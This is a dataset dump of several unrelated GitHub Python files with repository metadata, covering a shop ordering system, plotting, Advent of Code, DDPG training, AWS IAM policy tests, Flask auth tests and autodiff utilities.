store.\n \"\"\"\n\n def __init__(self, item_info: ItemInfoType):\n self.id = item_info.get(\"id\")\n self.name = item_info.get(\"name\")\n self.price = item_info.get(\"price\")\n self.product_category = item_info.get(\"product_category\")\n\n\nclass Customer:\n \"\"\"\n Represents a customer in the store.\n \"\"\"\n\n @handle_operation_errors\n def __init__(self, store, customer_info: CustomerInfoType):\n is_valid_customer(customer_info)\n\n self.store = store\n self.name = customer_info.get(\"name\")\n self.surname = customer_info.get(\"surname\")\n self.__email = customer_info.get(\"email\")\n self.__address = customer_info.get(\"address\")\n self.order = Order(self, store)\n\n\nclass Order:\n \"\"\"\n Represents a order of a customer.\n \"\"\"\n\n def __init__(self, customer, store):\n self.customer = customer\n self.store = store\n self.items = {}\n\n @handle_operation_errors\n def add_item(self, item_id: int):\n \"\"\"\n Add an item to the order by its ID.\n \"\"\"\n\n if not isinstance(item_id, int):\n raise ValueError(\"Item id must be of type number!\")\n\n item = self.store.get_item_by_id(item_id)\n\n if item:\n self.items[item_id] = item\n print(f\"\\n\\n{item.name} successfully added to your order!\\n\\n\")\n\n def get_total_price(self):\n \"\"\"\n Calculate the total price of the items in the order.\n \"\"\"\n\n total = sum(item.price for item in self.items.values())\n return total\n\n def view_order(self):\n \"\"\"\n View the items in the order and their total price.\n \"\"\"\n\n if not self.items.values():\n print(\"\\n\\nYour order is empty! Add some items!\\n\\n\")\n else:\n print(\"\\n\\nYour order:\")\n\n for item in self.items.values():\n print(f\" - {item.name} at: {item.price}! (id: {item.id})\")\n total = self.get_total_price()\n\n print(f\"Total: {total}\\n\\n\")\n\n @handle_operation_errors\n def remove_item(self, item_id: int):\n \"\"\"\n Remove an item from the order by its ID.\n \"\"\"\n\n if item_id in self.items:\n del self.items[item_id]\n print(f\"\\n\\nItem with id: {item_id} removed from order!\\n\\n\")\n else:\n raise KeyError(\"Item not found in order!\")\n\n def clear_order(self):\n self.items.clear()\n\n\nclass Payment:\n \"\"\"\n Represents the payment process for a customer's order.\n \"\"\"\n\n def __init__(self, customer):\n self.customer = customer\n self.order = customer.order\n\n def make_payment(self):\n \"\"\"\n Process a payment for the customer's order.\n \"\"\"\n\n item_list = [item.name for item in self.order.items.values()]\n\n print(item_list)\n if not self.order.items.values():\n print(\n \"\\n\\nError: Your order is empty. Add items to your order before making a payment!\\n\\n\"\n )\n else:\n item_list = [item.name for item in self.order.items.values()]\n items_string = \", \".join(item_list)\n total = self.order.get_total_price()\n self.order.clear_order()\n print(f\"\\n\\nSucess! You just bought: {items_string} for {total}\\n\\n\")\n","repo_name":"giuseppe-messi/python-online-shop-ordering-system","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30574721512","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 29 16:44:36 2018\n\n@author: Kalexa\n\"\"\"\n\nimport matplotlib . 
pyplot as plt\n#import numpy as np\n# First I am going to create three empty lists\nv1 = []\nv2 = []\nv3 = []\n# Then I create a variable called numero, which starts at zero\nnumero = 0\nnumero_final = 10\npaso = 0.01\n# v1 will be a list of numbers ordered from 0 to 10\n# v2 will be the square of v1\nwhile numero <= numero_final:\n    v1.append(numero)  # take v1 and append the value of numero at the end\n    v2.append(numero ** 2)  # take v2 and append numero squared at the end\n    v3.append(numero ** 3)  # same, cubed\n    numero = numero + paso  # numero advances by paso each iteration\n# Plot v2 as a function of v1\n# This should be a quadratic function, since point by point v2=v1^2\nplt.plot(v1, v2, \".\")\nplt.plot(v1, v3, \".\")\n# Show the plot on screen\nplt.show()\n# First points, then refine the grid, then remove the \".\"\n\n","repo_name":"Ivan9912/mis-archivos-de-python","sub_path":"Exactas Programa/Programas .py/TP Fisica MRU-V-Oscilatorio/Ejercicios concreto Fisica/funcion lineal ejemplo pp.py","file_name":"funcion lineal ejemplo pp.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1467608792","text":"\nimport re\n\n\ndef apply_mask(mask, value):\n    occ_0 = [s.start() for s in re.finditer(\"0\", mask)]\n    occ_1 = [s.start() for s in re.finditer(\"1\", mask)]\n    for occ in occ_0:\n        value = value[:occ]+\"0\"+value[occ+1:]\n    for occ in occ_1:\n        value = value[:occ]+\"1\"+value[occ+1:]\n    return value\n\n\ndef apply_mask_2(mask, value):\n    occ_X = [s.start() for s in re.finditer(\"X\", mask)]\n    occ_1 = [s.start() for s in re.finditer(\"1\", mask)]\n    for occ in occ_X:\n        value = value[:occ]+\"X\"+value[occ+1:]\n    for occ in occ_1:\n        value = value[:occ]+\"1\"+value[occ+1:]\n    return value\n\n\ndef exec_line_1(line, mask, mem):\n    if \"mask\" in line:\n        mask = line.split(\"mask = \")[-1]\n    if \"mem\" in line:\n        mem[re.search(r\"\\d+\", line).group(0)] = int(apply_mask(mask,\n                                                              format(int(line.split(\"= \")[-1]), \"036b\")), 2)\n    return mask, mem\n\n\ndef exec_line_2(line, mask, mem):\n    if \"mask\" in line:\n        mask = line.split(\"mask = \")[-1]\n    if \"mem\" in line:\n        init_address = format(int(re.search(r\"\\d+\", line).group(0)), \"036b\")\n        masked_address = apply_mask_2(mask, init_address)\n        possible_addresses = get_addresses_rec(masked_address)\n        value = int(line.split(\"= \")[-1])\n        for address in possible_addresses:\n            mem[str(int(address, 2))] = value\n    return mask, mem\n\n\ndef get_addresses_rec(bits):\n    if \"X\" not in bits:\n        return [bits]\n    else:\n        idx_of_X = bits.index(\"X\")\n        bits_0 = bits[:idx_of_X]+\"0\"+bits[idx_of_X+1:]\n        bits_1 = bits[:idx_of_X]+\"1\"+bits[idx_of_X+1:]\n        return get_addresses_rec(bits_0)+get_addresses_rec(bits_1)\n\n\nif __name__ == \"__main__\":\n    with open(\"inputs/day14.txt\") as f:\n        data = f.read().splitlines()\n    mask_1 = \"\"\n    mem_1 = {}\n    mask_2 = \"\"\n    mem_2 = {}\n    for line in data:\n        mask_1, mem_1 = exec_line_1(line, mask_1, mem_1)\n        mask_2, mem_2 = exec_line_2(line, mask_2, mem_2)\n    print(sum(mem_1.values()))\n    print(sum(mem_2.values()))\n","repo_name":"Kornflex28/adventofcode2020","sub_path":"code/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
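get_addresses_rec in the day14 record above branches once per floating X bit, so a mask with k Xs expands into 2**k concrete addresses. A quick standalone check of that blow-up (expand mirrors the record's recursion under a different name):

def expand(bits):
    if 'X' not in bits:
        return [bits]
    i = bits.index('X')
    return expand(bits[:i] + '0' + bits[i+1:]) + expand(bits[:i] + '1' + bits[i+1:])

addresses = expand('1X0X')
print(addresses)                 # ['1000', '1001', '1100', '1101']
assert len(addresses) == 2 ** 2  # two floating bits -> four addresses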
+{"seq_id":"4324146735","text":"import tensorflow as tf\nimport gym\nimport numpy as np\nimport shutil\nimport os\n\n# reproducible results\nnp.random.seed(1)\ntf.set_random_seed(1)\n\n# Load Environment\nENV_NAME = 'BipedalWalker-v2'\nenv = gym.make(ENV_NAME)\n# Reproducible environment parameters\nenv.seed(1)\n\n\nSTATE_DIMENSION = env.observation_space.shape[0] \nACTION_DIMENSION = env.action_space.shape[0] \nACTION_BOUND = env.action_space.high \n\n######################################## Hyperparameters ########################################\n\n# number of episodes to be trained\nTRAIN_EPI_NUM=500\n# Learning rate for actor and critic\nACTOR_LR=0.05\nCRITIC_LR=0.05\nR_DISCOUNT=0.9 # reward discount\n\nMEMORY_CAPACITY=1000000\n\nACTOR_REP_ITE=1700 # update the ACTOR target network after this many iterations\nCRITIC_REP_ITE=1500\n\nBATCH=40 # size of batch used to learn\n\n# Path used to store training result (parameters)\nTRAIN_DATA_PATH='./train'\n\n\nGLOBAL_STEP = tf.Variable(0, trainable=False) # record how many steps we have gone through\nINCREASE_GLOBAL_STEP = GLOBAL_STEP.assign(tf.add(GLOBAL_STEP, 1))\n\n\n# set automatically decaying learning rate to ensure convergence\nACTOR_LR = tf.train.exponential_decay(ACTOR_LR, GLOBAL_STEP, 10000, .95, staircase=True)\nCRITIC_LR = tf.train.exponential_decay(CRITIC_LR, GLOBAL_STEP, 10000, .90, staircase=True)\n\n\nEND_POINT = (200 - 10) * (14/30) # The end point of the game\n\n\n##################################################\nLOAD_MODEL = True # Whether to load trained model#\n##################################################\n\n\nwith tf.Session() as sess:\n\n    # Create actor and critic.\n    actor = Actor(sess, ACTION_DIMENSION, ACTION_BOUND, ACTOR_LR, ACTOR_REP_ITE)\n    critic = Critic(sess, STATE_DIMENSION, ACTION_DIMENSION, CRITIC_LR, R_DISCOUNT, CRITIC_REP_ITE, actor.a, actor.a_)\n\n    actor.add_grad_to_graph(critic.a_grads)\n\n    # Memory class implementation from: https://github.com/jaara/AI-blog/blob/master/Seaquest-DDQN-PER.py\n    memory = Memory(MEMORY_CAPACITY)\n\n    # saver is used to store or restore trained parameters\n    saver = tf.train.Saver(max_to_keep=100) # Maximum number of recent checkpoints to keep. Defaults to 5.
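Memory here is the proportional prioritized-replay buffer from the linked Seaquest-DDQN-PER post; prio_sample presumably draws stored transitions with probability proportional to their priority (roughly the magnitude of the TD error) and returns importance-sampling weights. A numpy-only sketch of that sampling rule, with hypothetical values and beta fixed at 1; this sketches the rule, not the sum-tree implementation:

import numpy as np

rng = np.random.default_rng(1)
priorities = np.array([0.1, 0.4, 0.2, 1.3])         # e.g. |TD error| per transition
p = priorities / priorities.sum()                   # proportional distribution
batch_idx = rng.choice(len(priorities), size=2, p=p)
weights = (len(priorities) * p[batch_idx]) ** -1.0  # IS correction with beta = 1
print(batch_idx, weights / weights.max())           # normalized weights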
\n\n\n    ################################# Determine whether it's a new training or an ongoing training ################\n    if LOAD_MODEL: # Returns CheckpointState proto from the \"checkpoint\" file.\n        checkpoints = tf.train.get_checkpoint_state(TRAIN_DATA_PATH, 'checkpoint').all_model_checkpoint_paths\n        saver.restore(sess, checkpoints[-1]) # reload trained parameters into the tf session\n    else:\n        if os.path.isdir(TRAIN_DATA_PATH): \n            shutil.rmtree(TRAIN_DATA_PATH) # recursively remove all files under directory\n        os.mkdir(TRAIN_DATA_PATH)\n\n        sess.run(tf.global_variables_initializer())\n\n    explore_degree=0.1\n    explore_degree_minimum=0.0001\n    explore_decay_factor=0.99\n\n    ################################# Main loop for training #################################\n    for i_episode in range(TRAIN_EPI_NUM):\n        \n        state = env.reset()\n        episode_reward = 0 # the episode reward\n        \n        while True:\n\n            action = actor.act(state)\n\n            action = np.clip(np.random.normal(action, explore_degree), -ACTION_BOUND, ACTION_BOUND) # explore using randomness\n            next_state, reward, done, _ = env.step(action) \n\n            transition = np.hstack((state, action, [reward], next_state))\n            probability = np.max(memory.tree.tree[-memory.tree.capacity:])\n            memory.store(probability, transition) # stored for later learning\n\n            # when reward=-100, that means BipedalWalker has fallen to the ground\n            episode_reward += reward\n\n\n            # when the training reaches a stable stage, we lessen the probability of exploration\n            if GLOBAL_STEP.eval(sess) > MEMORY_CAPACITY/20:\n                explore_degree = max([explore_decay_factor*explore_degree, explore_degree_minimum]) # decay the action randomness\n                tree_index, b_memory, weights = memory.prio_sample(BATCH) # for critic update\n\n                b_state = b_memory[:, :STATE_DIMENSION]\n                b_action = b_memory[:, STATE_DIMENSION: STATE_DIMENSION + ACTION_DIMENSION]\n                b_reward = b_memory[:, -STATE_DIMENSION - 1: -STATE_DIMENSION]\n                b_next_state = b_memory[:, -STATE_DIMENSION:]\n                \n                td = critic.learn(b_state, b_action, b_reward, b_next_state, weights)\n                actor.learn(b_state)\n                \n                for i in range(len(tree_index)): # update priority\n                    index = tree_index[i]\n                    memory.update(index, td[i])\n\n\n            # if GLOBAL_STEP.eval(sess) % SAVE_MODEL_ITER == 0:\n            #     ckpt_path = os.path.join(TRAIN_DATA_PATH, 'DDPG.ckpt')\n            #     save_path = saver.save(sess, ckpt_path, global_step=GLOBAL_STEP, write_meta_graph=False)\n            #     print(\"\\nSave Model %s\\n\" % save_path)\n\n            if done:\n                if \"running_reward\" not in globals():\n                    running_reward = episode_reward\n                else:\n                    running_reward = 0.95*running_reward + 0.05*episode_reward\n                \n                print('running reward: ',running_reward,', episode reward: ',episode_reward)\n                break # start new episode\n\n            state = next_state\n            sess.run(INCREASE_GLOBAL_STEP)\n\n\n","repo_name":"bluemapleman/Maple-Reinforcement-Learning","sub_path":"ActorCritic/duplicate for DDPG train/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":5362,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"20606488041","text":"def apply(args, data):\n    \"\"\"Filter results based on the arguments provided\"\"\"\n    filter_sort = args.get('sort')\n    filter_name = args.get('name')\n    filter_type = args.get('type')\n    filter_arch = args.get('network_arch')\n    filter_read_only = args.get('read_only')\n\n    if filter_name is not None:\n        data = list(filter(lambda d: d.get('name') == filter_name, data))\n    if filter_type is not None:\n        data = list(filter(lambda d: d.get('type') == filter_type, data))\n    if filter_arch is not None:\n        data = list(filter(lambda d: 
d.get('network_arch') == filter_arch, data))\n if filter_read_only is not None:\n filter_read_only_as_boolean = filter_read_only == 'true'\n data = list(filter(lambda d: d.get('read_only') == filter_read_only_as_boolean, data))\n\n if filter_sort == 'name-ascending':\n data = sorted(data, key=lambda d: '' + d.get('name') + ':' + d.get('version'), reverse=False)\n elif filter_sort == 'name-descending':\n data = sorted(data, key=lambda d: '' + d.get('name') + ':' + d.get('version'), reverse=True)\n elif filter_sort == 'date-ascending':\n data = sorted(data, key=lambda d: d.get('last_modified'), reverse=False)\n else: # filter_sort == 'date-descending'\n data = sorted(data, key=lambda d: d.get('last_modified'), reverse=True)\n\n return data\n","repo_name":"NVIDIA/tao_front_end_services","sub_path":"api/filter_utils/filtering.py","file_name":"filtering.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"70250900330","text":"import os\nfrom multiprocessing import Process, Value, Array\n\n\nprocs = 3\ncount = 0\n\n\ndef show_data(label, val, arr):\n msg = \"%-12s: pid: %4s, global:%s, value: %s, array:%s\"\n print(\"Process Array\", list(arr))\n print(msg % (label, os.getpid(), count, val.value, list(arr)))\n\n\ndef updater(val, arr):\n global count\n count += 1\n val.value += 1\n print(\"Val\", val.value)\n for i in range(3):\n arr[i] += 1\n print(\"Process Array\", list(arr))\n\n\nif __name__ == \"__main__\":\n scalar = Value(\"i\", 0)\n vector = Array(\"d\", procs)\n (\"parent start\", scalar, vector)\n show_data(\"parent\", scalar, vector)\n p = Process(target=show_data, args=(\"child\", scalar, vector))\n p.start()\n p.join()\n print('\\nloop1 (updates in parent, serial children)')\n for i in range(procs):\n count += 1\n scalar.value += 1\n vector[i] += 1\n p = Process(target=show_data, args=((\"process %s\" % i), scalar, vector))\n p.start()\n p.join()\n print(\"Value:\", scalar.value)\n print(\"Array:\", list(vector))\n print('\\nloop2 (updates in parent, parallel children)')\n ps = []\n for i in range(procs):\n count += 1\n scalar.value += 1\n vector[i] += 1\n p = Process(target=show_data, args=((\"process %s\" % i), scalar, vector))\n p.start()\n ps.append(p)\n for p in ps:\n p.join()\n print(\"Value:\", scalar.value)\n print(\"Array:\", list(vector))\n print('\\nloop3 (updates in serial children)')\n for i in range(procs):\n p = Process(target=updater, args=(scalar, vector))\n p.start()\n p.join()\n show_data(\"parent temp\", scalar, vector)\n\n print('\\nloop4 (updates in parallel children)')\n ps = []\n for i in range(procs):\n p = Process(target=updater, args=(scalar, vector))\n p.start()\n ps.append(p)\n for p in ps:\n p.join()\n show_data(\"parent end\", scalar, vector)\n","repo_name":"chcorophyll/algorithm_4th","sub_path":"PekingUniversity/recursion/multiprocess_test.py","file_name":"multiprocess_test.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19326370946","text":"import json\nimport sys\nimport boto3\nimport string\nimport random\n\nclient = boto3.client('iam')\naccount_id = boto3.client('sts').get_caller_identity().get('Account')\n\n\ndef out(statements):\n for s in statements:\n pretty = json.dumps(s.to_json(), indent=4)\n print(pretty)\n\n\ndef deploy(statements, type='policy'):\n if type == 'policy':\n deploy_policy(statements)\n elif type == 'assume':\n 
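The apply() helper above is just filter() chained into sorted() over a list of dicts; the same pattern stands alone with made-up records (models and its field values are illustrative, not from the record):

models = [
    {'name': 'a', 'version': '2', 'last_modified': 3, 'read_only': True},
    {'name': 'b', 'version': '1', 'last_modified': 1, 'read_only': False},
]
wanted = list(filter(lambda d: d.get('read_only') is True, models))
newest_first = sorted(wanted, key=lambda d: d.get('last_modified'), reverse=True)
print([d['name'] for d in newest_first])   # -> ['a']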
deploy_assume(statements)\n elif type == 'access':\n deploy_access(statements)\n else:\n raise Exception('Unknown deploy type: %s' % type)\n\n\ndef deploy_policy(statements):\n policy_name = new_random_name()\n\n log('Creating test policy %s...\\n' % policy_name)\n\n document = make_policy_document(statements)\n\n response = client.create_policy(\n PolicyName=policy_name,\n PolicyDocument=document,\n Description='Testing policy creation'\n )\n\n log('Deleting test policy %s...\\n' % policy_name)\n client.delete_policy(\n PolicyArn=response['Policy']['Arn']\n )\n\n\ndef deploy_assume(statements):\n role_name = new_random_name()\n\n log('Creating test role %s...\\n' % role_name)\n\n document = make_policy_document(statements)\n\n client.create_role(\n RoleName=role_name,\n AssumeRolePolicyDocument=document,\n Description='Testing assume policy creation',\n )\n\n client.delete_role(\n RoleName=role_name\n )\n\n\ndef deploy_access(statements):\n bucket_name = 'random-bucket-for-floyd-' + new_random_name().lower()\n\n log('Creating test bucket %s...\\n' % bucket_name)\n\n document = make_policy_document(\n statements, replace_s3_examples, bucket_name)\n\n s3 = boto3.client('s3')\n s3.create_bucket(Bucket=bucket_name)\n\n log('Attaching bucket policy...\\n')\n s3.put_bucket_policy(\n Bucket=bucket_name,\n Policy=document,\n )\n\n log('Deleting test bucket %s...\\n' % bucket_name)\n s3.delete_bucket(Bucket=bucket_name)\n\n\n# replace potential sensitive content in examples code\ndef replace_s3_examples(j, bucket_name):\n if 'NotPrincipal' in j['Statement'][0] and 'AWS' \\\n in j['Statement'][0]['NotPrincipal']:\n j['Statement'][0]['NotPrincipal']['AWS'][0] = \\\n j['Statement'][0]['NotPrincipal']['AWS'][0].replace(\n 'Bob', 'dev')\n j['Statement'][0]['NotPrincipal']['AWS'][0] = \\\n j['Statement'][0]['NotPrincipal']['AWS'][0].replace(\n '1234567890', account_id)\n\n if 'Resource' in j['Statement'][0]:\n j['Statement'][0]['Resource'] = \\\n j['Statement'][0]['Resource'].replace(\n 'example-bucket', bucket_name)\n return j\n\n\ndef make_policy_document(statements, filter=None, filter_options=None):\n j = {\n 'Version': '2012-10-17',\n 'Statement': list(map(lambda x: x.to_json(), statements))\n }\n\n if filter is not None:\n j = filter(j, filter_options)\n\n return json.dumps(j, indent=4)\n\n\ndef new_random_name():\n return ''.join(random.choice(\n string.ascii_uppercase + string.digits) for _ in range(10))\n\n\ndef log(data):\n sys.stderr.write(data)\n","repo_name":"udondan/iam-floyd","sub_path":"helper/python/python_test.py","file_name":"python_test.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":524,"dataset":"github-code","pt":"53"} +{"seq_id":"13919438601","text":"import argparse\nimport math\n\nimport cv2\nfrom mmdeploy_runtime import Detector\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='show how to use sdk python api')\n parser.add_argument('device_name', help='name of device, cuda or cpu')\n parser.add_argument(\n 'model_path',\n help='path of mmdeploy SDK model dumped by model converter')\n parser.add_argument('image_path', help='path of an image')\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n\n img = cv2.imread(args.image_path)\n detector = Detector(\n model_path=args.model_path, device_name=args.device_name, device_id=0)\n bboxes, labels, masks = detector(img)\n\n indices = [i for i in range(len(bboxes))]\n for index, bbox, label_id in zip(indices, bboxes, 
labels):\n        [left, top, right, bottom], score = bbox[0:4].astype(int), bbox[4]\n        if score < 0.3:\n            continue\n\n        cv2.rectangle(img, (left, top), (right, bottom), (0, 255, 0))\n\n        if masks[index].size:\n            mask = masks[index]\n            blue, green, red = cv2.split(img)\n            if mask.shape == img.shape[:2]:  # rtmdet-inst\n                mask_img = blue\n            else:  # maskrcnn\n                x0 = int(max(math.floor(bbox[0]) - 1, 0))\n                y0 = int(max(math.floor(bbox[1]) - 1, 0))\n                mask_img = blue[y0:y0 + mask.shape[0], x0:x0 + mask.shape[1]]\n            cv2.bitwise_or(mask, mask_img, mask_img)\n            img = cv2.merge([blue, green, red])\n\n    cv2.imwrite('output_detection.png', img)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"open-mmlab/mmdeploy","sub_path":"demo/python/object_detection.py","file_name":"object_detection.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"}
+{"seq_id":"9354059370","text":"import numpy as np\n\n\ndef crossover_mask(X, M):\n    # swap the entries of the two parent rows of X wherever the mask M is True\n    _X = np.copy(X)\n    _X[0][M] = X[1][M]\n    _X[1][M] = X[0][M]\n\n    return _X\n","repo_name":"AIasd/ADFuzz","sub_path":"pymoo/pymoo/operators/crossover/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"}
+{"seq_id":"42077339151","text":"from mock import patch, Mock\nfrom nose.tools import assert_equal\nfrom hamcrest import assert_that, equal_to, ends_with, contains_string\n\nfrom tests.application.support.flask_app_test_case import(\n    FlaskAppTestCase,\n    signed_in)\n\nfrom application import app\nfrom application.controllers.authentication import get_authorization_url\nfrom application.redis_session import RedisSession\nfrom requests import ConnectionError, Timeout\nfrom performanceplatform.client.admin import AdminAPI\n\n\n@patch('requests_oauthlib.OAuth2Session.fetch_token')\n@patch('requests_oauthlib.OAuth2Session.get')\n@patch('requests_oauthlib.OAuth2Session.authorization_url')\nclass AuthenticationTestCase(FlaskAppTestCase):\n\n    @signed_in()\n    def test_signout_redirects_properly_and_clears_session(\n            self,\n            oauth_authorization_url_patch,\n            oauth_get_patch,\n            oauth_fetch_token_patch,\n            client):\n        response = client.get(\"/sign-out\")\n        assert_that(response.status_code, equal_to(302))\n        assert_that(\n            response.headers['Location'], ends_with('/users/sign_out'))\n        with client.session_transaction() as session:\n            assert_that(\n                session,\n                equal_to({}))\n\n    def test_signin_development_route(\n            self,\n            oauth_authorization_url_patch,\n            oauth_get_patch,\n            oauth_fetch_token_patch):\n        response = self.client.get(\"/sign-in\")\n        assert_that(response.status_code, equal_to(302))\n        assert_that(\n            response.headers['Location'], ends_with('/'))\n        with self.client.session_transaction() as session:\n            assert_that(\n                session['oauth_token']['access_token'],\n                equal_to(app.config['FAKE_OAUTH_TOKEN']))\n            assert_that(\n                session['oauth_user'],\n                equal_to(app.config['FAKE_OAUTH_USER']))\n\n    def test_authorize_sets_correct_session_if_user_can_sign_in(\n            self,\n            oauth_authorization_url_patch,\n            oauth_get_patch,\n            oauth_fetch_token_patch):\n        token = \"token_token\"\n        user = {\n            'permissions': ['signin'],\n            'uid': \"bleep_bloop_blarp\"\n        }\n        oauth_get_response = Mock()\n        oauth_get_response.json = Mock(return_value={\n            'user': user\n        })\n        oauth_get_patch.return_value = oauth_get_response\n        oauth_fetch_token_patch.return_value = token\n        with 
self.client.session_transaction() as sess:\n sess['oauth_state'] = \"foo\"\n response = self.client.get(\n '/auth/gds/callback')\n self.assert_session_contains('oauth_user', user)\n self.assert_session_contains('oauth_token', token)\n self.assert_flashes('You have been successfully signed in')\n assert_equal(response.headers['Location'], 'http://localhost/')\n assert_equal(response.status_code, 302)\n\n def test_authorize_sends_client_id_with_user_json(\n self,\n oauth_authorization_url_patch,\n oauth_get_patch,\n oauth_fetch_token_patch):\n token = \"token_token\"\n user = {\n 'permissions': ['signin'],\n 'uid': \"bleep_bloop_blarp\"\n }\n oauth_get_response = Mock()\n oauth_get_response.json = Mock(return_value={\n 'user': user\n })\n oauth_get_patch.return_value = oauth_get_response\n oauth_fetch_token_patch.return_value = token\n with self.client.session_transaction() as sess:\n sess['oauth_state'] = \"foo\"\n response = self.client.get(\n '/auth/gds/callback')\n\n oauth_get_patch.assert_called_with(\n 'http://signon.dev.gov.uk/user.json?client_id=oauth_id')\n\n def test_authorize_does_not_sign_in_if_user_cannot_sign_in(\n self,\n oauth_authorization_url_patch,\n oauth_get_patch,\n oauth_fetch_token_patch):\n token = \"token_token\"\n user = {\n 'permissions': [],\n 'uid': \"bleep_bloop_blarp\"\n }\n oauth_get_response = Mock()\n oauth_get_response.json = Mock(return_value={\n 'user': user\n })\n oauth_get_patch.return_value = oauth_get_response\n oauth_fetch_token_patch.return_value = token\n with self.client.session_transaction() as sess:\n sess['oauth_state'] = \"foo\"\n response = self.client.get(\n '/auth/gds/callback')\n self.assert_session_contains('oauth_user', user)\n self.assert_session_contains('oauth_token', token)\n assert_equal(len(self.get_flashes()), 0)\n assert_equal(response.headers['Location'], 'http://localhost/')\n assert_equal(response.status_code, 302)\n\n def test_get_authorization_url_sets_oauth_state_returns_url(\n self,\n oauth_authorization_url_patch,\n oauth_get_patch,\n oauth_fetch_token_patch):\n oauth_authorization_url_patch.return_value = ('some url', 'state')\n session = {}\n assert_equal(get_authorization_url(session), 'some url')\n assert_equal(session, {'oauth_state': 'state'})\n\n\n@patch('performanceplatform.client.admin.AdminAPI.reauth')\n@patch('requests_oauthlib.OAuth2Session.get')\n@patch('application.redis_session.RedisSession.delete_sessions_for_user')\nclass SignonCallbacksTestCase(FlaskAppTestCase):\n\n def setUp(self):\n super(SignonCallbacksTestCase, self).setUp()\n self.headers = [('Authorization', 'Bearer foobar')]\n\n def test_reauth_with_invalid_user(\n self,\n session_delete_sessions_for_user_patch,\n oauth_get_patch,\n reauth_patch):\n # Set up the Mock for calling Signon\n self.mock_signon_json(\n oauth_get_patch).return_value = self.not_allowed_user_update_json()\n self.expected_unused(session_delete_sessions_for_user_patch)\n self.expected_unused(reauth_patch)\n\n response = self.do_reauth_post()\n self.assertEqual(403, response.status_code, response.data)\n\n def test_reauth_when_invalid_json(\n self,\n session_delete_sessions_for_user_patch,\n oauth_get_patch,\n reauth_patch):\n # Set up the Mock for calling Signon\n self.mock_signon_json(oauth_get_patch).side_effect = ValueError()\n self.expected_unused(session_delete_sessions_for_user_patch)\n self.expected_unused(reauth_patch)\n\n response = self.do_reauth_post()\n self.assertEqual(500, response.status_code, response.data)\n\n def test_reauth_with_valid_user(\n self,\n 
session_delete_sessions_for_user_patch,\n oauth_get_patch,\n reauth_patch):\n # Set up the Mock for calling Signon\n self.mock_signon_json(\n oauth_get_patch).return_value = self.allowed_user_update_json()\n\n response = self.do_reauth_post()\n\n self.assertEqual(200, response.status_code, response.data)\n\n session_delete_sessions_for_user_patch.assert_called_with('user-uid')\n reauth_patch.assert_called_with('user-uid')\n\n def test_reauth_when_signon_down(\n self,\n session_delete_sessions_for_user_patch,\n oauth_get_patch,\n reauth_patch):\n # Set up the Mock for calling Signon\n oauth_get_patch.side_effect = ConnectionError()\n self.expected_unused(session_delete_sessions_for_user_patch)\n self.expected_unused(reauth_patch)\n\n response = self.do_reauth_post()\n self.assertEqual(500, response.status_code, response.data)\n\n def test_reauth_when_signon_really_slow(\n self,\n session_delete_sessions_for_user_patch,\n oauth_get_patch,\n reauth_patch):\n # Set up the Mock for calling Signon\n oauth_get_patch.side_effect = Timeout()\n self.expected_unused(session_delete_sessions_for_user_patch)\n self.expected_unused(reauth_patch)\n\n response = self.do_reauth_post()\n self.assertEqual(500, response.status_code, response.data)\n\n def test_reauth_when_signon_unauthenticated(\n self,\n session_delete_sessions_for_user_patch,\n oauth_get_patch,\n reauth_patch):\n # Set up the Mock for calling Signon\n oauth_get_patch.return_value.status_code = 401\n self.expected_unused(session_delete_sessions_for_user_patch)\n self.expected_unused(reauth_patch)\n\n response = self.do_reauth_post()\n self.assertEqual(401, response.status_code, response.data)\n\n def mock_signon_json(self, mock_signon):\n return mock_signon.return_value.json\n\n def expected_unused(self, patched_mock):\n # assert that the mock wasn't used. 
If this is caused, then\n # things should fail in tests.\n patched_mock.side_effect = Exception(\"Unexpected usage\")\n\n def allowed_user_update_json(self):\n return self.create_user_json(['user_update_permission'])\n\n def not_allowed_user_update_json(self):\n return self.create_user_json([])\n\n def create_user_json(self, permissions):\n user = {}\n user['user'] = {}\n user['user']['permissions'] = permissions\n return user\n\n def do_reauth_post(self):\n return self.client.post(\n '/auth/gds/api/users/user-uid/reauth', headers=self.headers)\n","repo_name":"alphagov/performanceplatform-admin","sub_path":"tests/application/controllers/test_authentication.py","file_name":"test_authentication.py","file_ext":"py","file_size_in_byte":9449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11175087218","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport tadpole.util as util\nimport tadpole.autodiff as ad\nimport tadpole.tensor as tn\n\nfrom tadpole.index import (\n Index,\n IndexGen, \n Indices,\n)\n\n\n\n\n###############################################################################\n### ###\n### Tensor reindexing functions ###\n### ###\n###############################################################################\n\n\n# --- Reindexing and reshaping methods -------------------------------------- #\n\ndef vjp_reindex(g, out, x, indmap):\n\n return tn.reindex(g, util.unpacked_dict(util.inverted_dict(indmap))) \n\n\n\ndef vjp_transpose(g, out, x, *output_inds):\n\n return tn.transpose(g, *tn.union_inds(x))\n \n\n\ndef vjp_fuse(g, out, x, 